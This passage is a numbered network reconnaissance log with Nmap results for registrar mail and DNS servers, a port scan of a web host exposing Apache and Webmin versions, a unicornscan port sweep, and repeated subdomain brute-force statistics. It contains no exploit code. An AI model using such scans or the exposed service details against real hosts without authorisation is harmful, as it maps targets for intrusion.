1151 Script Info: | Subject Alternative Name: DNS:eforward1.registrar-servers.com, DNS:eforward.registrar-servers.com, DNS:eforward2.registrar-servers.com, DNS:eforward3.registrar-servers.com, DNS:eforward4.registrar-servers.com, DNS:eforward5.registrar-servers.com, DNS:se.registrar-servers.com, DNS:se.web-hosting.com, DNS:se14.registrar-servers.com, DNS:se15.registrar-servers.com, DNS:se16.registrar-servers.com, DNS:se17.registrar-servers.com, DNS:se18.registrar-servers.com, DNS:se19.registrar-servers.com, DNS:se20.registrar-servers.com, DNS:se21.registrar-servers.com, DNS:se5.registrar-servers.com, DNS:seq.web-hosting.com, DNS:sequarantine.registrar-servers.com, DNS:sequarantine.web-hosting.com, DNS:smx.registrar-servers.com, DNS:smx.web-hosting.com, DNS:smx1.registrar-servers.com, DNS:smx1.web-hosting.com, DNS:smx2.registrar-servers.com, DNS:smx2.web-hosting.com, DNS:smx3.registrar-servers.com, DNS:smx3.web-hosting.com, DNS:smx4.registrar-servers.com, DNS:smx4.web-hosting.com, DNS:www.se.registrar-servers.com, DNS:www.se.web-hosting.com
1152 Script Info: | Issuer: commonName=Sectigo RSA Domain Validation Secure Server CA/organizationName=Sectigo Limited/stateOrProvinceName=Greater Manchester/countryName=GB
1153 Script Info: | Public Key type: rsa
1154 Script Info: | Public Key bits: 2048
1155 Script Info: | Signature Algorithm: sha256WithRSAEncryption
1156 Script Info: | Not valid before: 2019-06-27T00:00:00
1157 Script Info: | Not valid after: 2020-07-18T23:59:59
1158 Script Info: | MD5: ecad ac6b 2a41 9e9b 5245 9b22 011b b2f1
1159 Script Info: |_SHA-1: 0d99 77fa c957 3265 8884 d2db 6e6a 4b60 e379 9f56
1160 Script Info: |_ssl-date: TLS randomness does not represent time
1161 Os Info: Host: se18.registrar-servers.com
1162 IP: 162.255.118.61
1163 HostName: eforward3.registrar-servers.com Type: MX
1164 HostName: eforward.web-hosting.com Type: PTR
1165 HostName: eforward1.registrar-servers.com Type: MX
1166 Country: United States
1167 Is Active: True (reset ttl 64)
1168 Port: 587/tcp open smtp syn-ack ttl 50 Exim smtpd 20191015.1020
1169 Script Info: | smtp-commands: se18.registrar-servers.com Hello nmap.scanme.org [45.131.5.12], SIZE, 8BITMIME, DSN, AUTH PLAIN LOGIN, STARTTLS, HELP,
1170 Script Info: |_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
1171 Script Info: | ssl-cert: Subject: commonName=eforward1.registrar-servers.com
1172 Script Info: | Subject Alternative Name: DNS:eforward1.registrar-servers.com, DNS:eforward.registrar-servers.com, DNS:eforward2.registrar-servers.com, DNS:eforward3.registrar-servers.com, DNS:eforward4.registrar-servers.com, DNS:eforward5.registrar-servers.com, DNS:se.registrar-servers.com, DNS:se.web-hosting.com, DNS:se14.registrar-servers.com, DNS:se15.registrar-servers.com, DNS:se16.registrar-servers.com, DNS:se17.registrar-servers.com, DNS:se18.registrar-servers.com, DNS:se19.registrar-servers.com, DNS:se20.registrar-servers.com, DNS:se21.registrar-servers.com, DNS:se5.registrar-servers.com, DNS:seq.web-hosting.com, DNS:sequarantine.registrar-servers.com, DNS:sequarantine.web-hosting.com, DNS:smx.registrar-servers.com, DNS:smx.web-hosting.com, DNS:smx1.registrar-servers.com, DNS:smx1.web-hosting.com, DNS:smx2.registrar-servers.com, DNS:smx2.web-hosting.com, DNS:smx3.registrar-servers.com, DNS:smx3.web-hosting.com, DNS:smx4.registrar-servers.com, DNS:smx4.web-hosting.com, DNS:www.se.registrar-servers.com, DNS:www.se.web-hosting.com
1173 Script Info: | Issuer: commonName=Sectigo RSA Domain Validation Secure Server CA/organizationName=Sectigo Limited/stateOrProvinceName=Greater Manchester/countryName=GB
1174 Script Info: | Public Key type: rsa
1175 Script Info: | Public Key bits: 2048
1176 Script Info: | Signature Algorithm: sha256WithRSAEncryption
1177 Script Info: | Not valid before: 2019-06-27T00:00:00
1178 Script Info: | Not valid after: 2020-07-18T23:59:59
1179 Script Info: | MD5: ecad ac6b 2a41 9e9b 5245 9b22 011b b2f1
1180 Script Info: |_SHA-1: 0d99 77fa c957 3265 8884 d2db 6e6a 4b60 e379 9f56
1181 Script Info: |_ssl-date: TLS randomness does not represent time
1182 Os Info: Host: se14.registrar-servers.com
1183 IP: 199.229.254.192
1184 Type: SPF
1185 Is Active: True (reset ttl 64)
1186 IP: 38.101.213.192
1187 Type: SPF
1188 Is Active: True (reset ttl 64)
1189 IP: 162.255.118.240
1190 Type: SPF
1191 Is Active: True (reset ttl 64)
1192 IP: 162.255.118.0
1193 Type: SPF
1194 Is Active: True (reset ttl 64)
1195 IP: 198.54.122.192
1196 Type: SPF
1197 Is Active: True (reset ttl 64)
1198 IP: 216.87.155.33
1199 HostName: dns1.registrar-servers.com Type: NS
1200 HostName: dns3.registrar-servers.com Type: PTR
1201 Country: United States
1202 Is Active: True (echo-reply ttl 58)
1203 Port: 53/tcp open domain? syn-ack ttl 58
1204 Script Info: | dns-nsid:
1205 Script Info: |_ id.server: nnn1-ams5
1206 Script Info: | fingerprint-strings:
1207 Script Info: | DNSVersionBindReqTCP:
1208 Script Info: | version
1209 Script Info: |_ bind
1210 IP: 198.54.122.0
1211 Type: SPF
1212 Is Active: True (reset ttl 64)
1213 IP: 209.105.246.192
1214 Type: SPF
1215 Is Active: True (reset ttl 64)
1216#######################################################################################################################################
1217Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-22 05:35 EDT
1218Nmap scan report for latina.petite.guru (185.82.200.52)
1219Host is up (0.28s latency).
1220Not shown: 996 closed ports
1221PORT STATE SERVICE VERSION
122222/tcp open tcpwrapped
122380/tcp open http Apache httpd 2.4.10 ((Debian))
1224443/tcp open ssl/http Apache httpd 2.4.10 ((Debian))
122510000/tcp open http MiniServ 1.910 (Webmin httpd)
1226#######################################################################################################################################
1227adding 185.82.200.52/32 mode `TCPscan' ports `7,9,11,13,18,19,21-23,25,37,39,42,49,50,53,65,67-70,79-81,88,98,100,105-107,109-111,113,118,119,123,129,135,137-139,143,150,161-164,174,177-179,191,199-202,204,206,209,210,213,220,345,346,347,369-372,389,406,407,422,443-445,487,500,512-514,517,518,520,525,533,538,548,554,563,587,610-612,631-634,636,642,653,655,657,666,706,750-752,765,779,808,873,901,923,941,946,992-995,1001,1023-1030,1080,1210,1214,1234,1241,1334,1349,1352,1423-1425,1433,1434,1524,1525,1645,1646,1649,1701,1718,1719,1720,1723,1755,1812,1813,2048-2050,2101-2104,2140,2150,2233,2323,2345,2401,2430,2431,2432,2433,2583,2628,2776,2777,2988,2989,3050,3130,3150,3232,3306,3389,3456,3493,3542-3545,3632,3690,3801,4000,4400,4321,4567,4899,5002,5136-5139,5150,5151,5222,5269,5308,5354,5355,5422-5425,5432,5503,5555,5556,5678,6000-6007,6346,6347,6543,6544,6789,6838,6666-6670,7000-7009,7028,7100,7983,8079-8082,8088,8787,8879,9090,9101-9103,9325,9359,10000,10026,10027,10067,10080,10081,10167,10498,11201,15345,17001-17003,18753,20011,20012,21554,22273,26274,27374,27444,27573,31335-31338,31787,31789,31790,31791,32668,32767-32780,33390,47262,49301,54320,54321,57341,58008,58009,58666,59211,60000,60006,61000,61348,61466,61603,63485,63808,63809,64429,65000,65506,65530-65535' pps 300
1228using interface(s) eth0
1229added module payload for port 5060 proto 17
1230added module payload for port 1900 proto 17
1231added module payload for port 53 proto 17
1232added module payload for port 80 proto 6
1233added module payload for port 80 proto 6
1234added module payload for port 518 proto 17
1235scaning 1.00e+00 total hosts with 3.38e+02 total packets, should take a little longer than 8 Seconds
1236drone type Unknown on fd 4 is version 1.1
1237drone type Unknown on fd 3 is version 1.1
1238added module payload for port 5060 proto 17
1239added module payload for port 1900 proto 17
1240added module payload for port 53 proto 17
1241added module payload for port 80 proto 6
1242added module payload for port 80 proto 6
1243added module payload for port 518 proto 17
1244scan iteration 1 out of 1
1245using pcap filter: `dst 192.168.0.52 and ! src 192.168.0.52 and (tcp)'
1246using TSC delay
1247sender statistics 299.9 pps with 338 packets sent total
1248listener statistics 220 packets recieved 0 packets droped and 0 interface drops
1249#######################################################################################################################################
1250Privileges have been dropped to "nobody:nogroup" for security reasons.
1251
1252Processed queries: 0
1253Received packets: 0
1254Progress: 0.00% (00 h 00 min 00 sec / 00 h 00 min 00 sec)
1255Current incoming rate: 0 pps, average: 0 pps
1256Current success rate: 0 pps, average: 0 pps
1257Finished total: 0, success: 0 (0.00%)
1258Mismatched domains: 0 (0.00%), IDs: 0 (0.00%)
1259Failures: 0: 0.00%, 1: 0.00%, 2: 0.00%, 3: 0.00%, 4: 0.00%, 5: 0.00%, 6: 0.00%, 7: 0.00%, 8: 0.00%, 9: 0.00%, 10: 0.00%, 11: 0.00%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1260Response: | Success: | Total:
1261OK: | 0 ( 0.00%) | 0 ( 0.00%)
1262NXDOMAIN: | 0 ( 0.00%) | 0 ( 0.00%)
1263SERVFAIL: | 0 ( 0.00%) | 0 ( 0.00%)
1264REFUSED: | 0 ( 0.00%) | 0 ( 0.00%)
1265FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1266
1267
1268
1269Processed queries: 1919
1270Received packets: 2093
1271Progress: 100.00% (00 h 00 min 01 sec / 00 h 00 min 01 sec)
1272Current incoming rate: 2089 pps, average: 2089 pps
1273Current success rate: 1409 pps, average: 1409 pps
1274Finished total: 1412, success: 1412 (100.00%)
1275Mismatched domains: 118 (5.66%), IDs: 0 (0.00%)
1276Failures: 0: 48.44%, 1: 64.52%, 2: 18.27%, 3: 4.18%, 4: 0.50%, 5: 0.00%, 6: 0.00%, 7: 0.00%, 8: 0.00%, 9: 0.00%, 10: 0.00%, 11: 0.00%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1277Response: | Success: | Total:
1278OK: | 131 ( 9.28%) | 135 ( 6.48%)
1279NXDOMAIN: | 1235 ( 87.46%) | 1324 ( 63.56%)
1280SERVFAIL: | 46 ( 3.26%) | 48 ( 2.30%)
1281REFUSED: | 0 ( 0.00%) | 576 ( 27.65%)
1282FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1283
1284
1285
1286Processed queries: 1919
1287Received packets: 2728
1288Progress: 100.00% (00 h 00 min 02 sec / 00 h 00 min 02 sec)
1289Current incoming rate: 633 pps, average: 1361 pps
1290Current success rate: 393 pps, average: 901 pps
1291Finished total: 1806, success: 1806 (100.00%)
1292Mismatched domains: 229 (8.45%), IDs: 0 (0.00%)
1293Failures: 0: 37.87%, 1: 33.39%, 2: 16.39%, 3: 11.02%, 4: 5.76%, 5: 1.44%, 6: 0.39%, 7: 0.00%, 8: 0.00%, 9: 0.00%, 10: 0.00%, 11: 0.00%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1294Response: | Success: | Total:
1295OK: | 163 ( 9.03%) | 168 ( 6.20%)
1296NXDOMAIN: | 1592 ( 88.15%) | 1777 ( 65.55%)
1297SERVFAIL: | 51 ( 2.82%) | 54 ( 1.99%)
1298REFUSED: | 0 ( 0.00%) | 712 ( 26.26%)
1299FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1300
1301
1302
1303Processed queries: 1919
1304Received packets: 2878
1305Progress: 100.00% (00 h 00 min 03 sec / 00 h 00 min 03 sec)
1306Current incoming rate: 149 pps, average: 957 pps
1307Current success rate: 89 pps, average: 630 pps
1308Finished total: 1896, success: 1896 (100.00%)
1309Mismatched domains: 265 (9.27%), IDs: 0 (0.00%)
1310Failures: 0: 36.08%, 1: 31.80%, 2: 15.61%, 3: 8.02%, 4: 5.06%, 5: 2.58%, 6: 1.27%, 7: 0.63%, 8: 0.16%, 9: 0.00%, 10: 0.00%, 11: 0.00%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1311Response: | Success: | Total:
1312OK: | 168 ( 8.86%) | 173 ( 6.05%)
1313NXDOMAIN: | 1677 ( 88.45%) | 1892 ( 66.15%)
1314SERVFAIL: | 51 ( 2.69%) | 55 ( 1.92%)
1315REFUSED: | 0 ( 0.00%) | 740 ( 25.87%)
1316FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1317
1318
1319
1320Processed queries: 1919
1321Received packets: 2914
1322Progress: 100.00% (00 h 00 min 04 sec / 00 h 00 min 04 sec)
1323Current incoming rate: 35 pps, average: 727 pps
1324Current success rate: 16 pps, average: 477 pps
1325Finished total: 1913, success: 1913 (100.00%)
1326Mismatched domains: 279 (9.63%), IDs: 0 (0.00%)
1327Failures: 0: 35.76%, 1: 31.52%, 2: 15.47%, 3: 7.95%, 4: 5.02%, 5: 2.25%, 6: 1.15%, 7: 0.63%, 8: 0.37%, 9: 0.10%, 10: 0.10%, 11: 0.00%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1328Response: | Success: | Total:
1329OK: | 171 ( 8.94%) | 176 ( 6.08%)
1330NXDOMAIN: | 1691 ( 88.40%) | 1919 ( 66.26%)
1331SERVFAIL: | 51 ( 2.67%) | 55 ( 1.90%)
1332REFUSED: | 0 ( 0.00%) | 746 ( 25.76%)
1333FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1334
1335
1336
1337Processed queries: 1919
1338Received packets: 2931
1339Progress: 100.00% (00 h 00 min 05 sec / 00 h 00 min 05 sec)
1340Current incoming rate: 16 pps, average: 585 pps
1341Current success rate: 4 pps, average: 382 pps
1342Finished total: 1918, success: 1918 (100.00%)
1343Mismatched domains: 290 (9.96%), IDs: 0 (0.00%)
1344Failures: 0: 35.66%, 1: 31.44%, 2: 15.43%, 3: 7.92%, 4: 5.01%, 5: 2.24%, 6: 1.15%, 7: 0.57%, 8: 0.31%, 9: 0.16%, 10: 0.05%, 11: 0.10%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1345Response: | Success: | Total:
1346OK: | 171 ( 8.92%) | 176 ( 6.04%)
1347NXDOMAIN: | 1696 ( 88.43%) | 1931 ( 66.29%)
1348SERVFAIL: | 51 ( 2.66%) | 55 ( 1.89%)
1349REFUSED: | 0 ( 0.00%) | 751 ( 25.78%)
1350FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1351
1352
1353
1354Processed queries: 1919
1355Received packets: 2939
1356Progress: 100.00% (00 h 00 min 06 sec / 00 h 00 min 06 sec)
1357Current incoming rate: 7 pps, average: 488 pps
1358Current success rate: 0 pps, average: 319 pps
1359Finished total: 1918, success: 1918 (100.00%)
1360Mismatched domains: 298 (10.20%), IDs: 0 (0.00%)
1361Failures: 0: 35.66%, 1: 31.44%, 2: 15.43%, 3: 7.92%, 4: 5.01%, 5: 2.24%, 6: 1.15%, 7: 0.57%, 8: 0.31%, 9: 0.10%, 10: 0.05%, 11: 0.16%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1362Response: | Success: | Total:
1363OK: | 171 ( 8.92%) | 176 ( 6.03%)
1364NXDOMAIN: | 1696 ( 88.43%) | 1936 ( 66.28%)
1365SERVFAIL: | 51 ( 2.66%) | 55 ( 1.88%)
1366REFUSED: | 0 ( 0.00%) | 753 ( 25.78%)
1367FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1368
1369
1370
1371Processed queries: 1919
1372Received packets: 2940
1373Progress: 100.00% (00 h 00 min 07 sec / 00 h 00 min 07 sec)
1374Current incoming rate: 0 pps, average: 419 pps
1375Current success rate: 0 pps, average: 273 pps
1376Finished total: 1918, success: 1918 (100.00%)
1377Mismatched domains: 299 (10.23%), IDs: 0 (0.00%)
1378Failures: 0: 35.66%, 1: 31.44%, 2: 15.43%, 3: 7.92%, 4: 5.01%, 5: 2.24%, 6: 1.15%, 7: 0.57%, 8: 0.31%, 9: 0.10%, 10: 0.05%, 11: 0.10%, 12: 0.00%, 13: 0.05%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1379Response: | Success: | Total:
1380OK: | 171 ( 8.92%) | 176 ( 6.02%)
1381NXDOMAIN: | 1696 ( 88.43%) | 1937 ( 66.29%)
1382SERVFAIL: | 51 ( 2.66%) | 55 ( 1.88%)
1383REFUSED: | 0 ( 0.00%) | 753 ( 25.77%)
1384FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1385
1386
1387
1388Processed queries: 1919
1389Received packets: 2941
1390Progress: 100.00% (00 h 00 min 08 sec / 00 h 00 min 08 sec)
1391Current incoming rate: 0 pps, average: 366 pps
1392Current success rate: 0 pps, average: 239 pps
1393Finished total: 1918, success: 1918 (100.00%)
1394Mismatched domains: 300 (10.26%), IDs: 0 (0.00%)
1395Failures: 0: 35.66%, 1: 31.44%, 2: 15.43%, 3: 7.92%, 4: 5.01%, 5: 2.24%, 6: 1.15%, 7: 0.57%, 8: 0.31%, 9: 0.10%, 10: 0.05%, 11: 0.10%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.05%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1396Response: | Success: | Total:
1397OK: | 171 ( 8.92%) | 176 ( 6.02%)
1398NXDOMAIN: | 1696 ( 88.43%) | 1937 ( 66.27%)
1399SERVFAIL: | 51 ( 2.66%) | 55 ( 1.88%)
1400REFUSED: | 0 ( 0.00%) | 754 ( 25.80%)
1401FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1402
1403
1404
1405Processed queries: 1919
1406Received packets: 2944
1407Progress: 100.00% (00 h 00 min 09 sec / 00 h 00 min 09 sec)
1408Current incoming rate: 2 pps, average: 326 pps
1409Current success rate: 0 pps, average: 212 pps
1410Finished total: 1918, success: 1918 (100.00%)
1411Mismatched domains: 303 (10.36%), IDs: 0 (0.00%)
1412Failures: 0: 35.66%, 1: 31.44%, 2: 15.43%, 3: 7.92%, 4: 5.01%, 5: 2.24%, 6: 1.15%, 7: 0.57%, 8: 0.31%, 9: 0.10%, 10: 0.05%, 11: 0.10%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.05%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1413Response: | Success: | Total:
1414OK: | 171 ( 8.92%) | 176 ( 6.02%)
1415NXDOMAIN: | 1696 ( 88.43%) | 1937 ( 66.20%)
1416SERVFAIL: | 51 ( 2.66%) | 56 ( 1.91%)
1417REFUSED: | 0 ( 0.00%) | 756 ( 25.84%)
1418FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1419
1420
1421
1422Processed queries: 1919
1423Received packets: 2944
1424Progress: 100.00% (00 h 00 min 10 sec / 00 h 00 min 10 sec)
1425Current incoming rate: 0 pps, average: 293 pps
1426Current success rate: 0 pps, average: 191 pps
1427Finished total: 1918, success: 1918 (100.00%)
1428Mismatched domains: 303 (10.36%), IDs: 0 (0.00%)
1429Failures: 0: 35.66%, 1: 31.44%, 2: 15.43%, 3: 7.92%, 4: 5.01%, 5: 2.24%, 6: 1.15%, 7: 0.57%, 8: 0.31%, 9: 0.10%, 10: 0.05%, 11: 0.10%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.05%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1430Response: | Success: | Total:
1431OK: | 171 ( 8.92%) | 176 ( 6.02%)
1432NXDOMAIN: | 1696 ( 88.43%) | 1937 ( 66.20%)
1433SERVFAIL: | 51 ( 2.66%) | 56 ( 1.91%)
1434REFUSED: | 0 ( 0.00%) | 756 ( 25.84%)
1435FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1436
1437
1438
1439Processed queries: 1919
1440Received packets: 2947
1441Progress: 100.00% (00 h 00 min 11 sec / 00 h 00 min 11 sec)
1442Current incoming rate: 2 pps, average: 267 pps
1443Current success rate: 0 pps, average: 174 pps
1444Finished total: 1918, success: 1918 (100.00%)
1445Mismatched domains: 306 (10.45%), IDs: 0 (0.00%)
1446Failures: 0: 35.66%, 1: 31.44%, 2: 15.43%, 3: 7.92%, 4: 5.01%, 5: 2.24%, 6: 1.15%, 7: 0.57%, 8: 0.31%, 9: 0.10%, 10: 0.05%, 11: 0.10%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.05%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1447Response: | Success: | Total:
1448OK: | 171 ( 8.92%) | 176 ( 6.01%)
1449NXDOMAIN: | 1696 ( 88.43%) | 1938 ( 66.17%)
1450SERVFAIL: | 51 ( 2.66%) | 58 ( 1.98%)
1451REFUSED: | 0 ( 0.00%) | 756 ( 25.81%)
1452FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1453
1454
1455
1456Processed queries: 1919
1457Received packets: 2949
1458Progress: 100.00% (00 h 00 min 12 sec / 00 h 00 min 12 sec)
1459Current incoming rate: 1 pps, average: 245 pps
1460Current success rate: 0 pps, average: 159 pps
1461Finished total: 1918, success: 1918 (100.00%)
1462Mismatched domains: 308 (10.51%), IDs: 0 (0.00%)
1463Failures: 0: 35.66%, 1: 31.44%, 2: 15.43%, 3: 7.92%, 4: 5.01%, 5: 2.24%, 6: 1.15%, 7: 0.57%, 8: 0.31%, 9: 0.10%, 10: 0.05%, 11: 0.10%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.05%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1464Response: | Success: | Total:
1465OK: | 171 ( 8.92%) | 176 ( 6.00%)
1466NXDOMAIN: | 1696 ( 88.43%) | 1938 ( 66.12%)
1467SERVFAIL: | 51 ( 2.66%) | 59 ( 2.01%)
1468REFUSED: | 0 ( 0.00%) | 757 ( 25.83%)
1469FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1470
1471
1472
1473Processed queries: 1919
1474Received packets: 2950
1475Progress: 100.00% (00 h 00 min 13 sec / 00 h 00 min 13 sec)
1476Current incoming rate: 0 pps, average: 226 pps
1477Current success rate: 0 pps, average: 147 pps
1478Finished total: 1918, success: 1918 (100.00%)
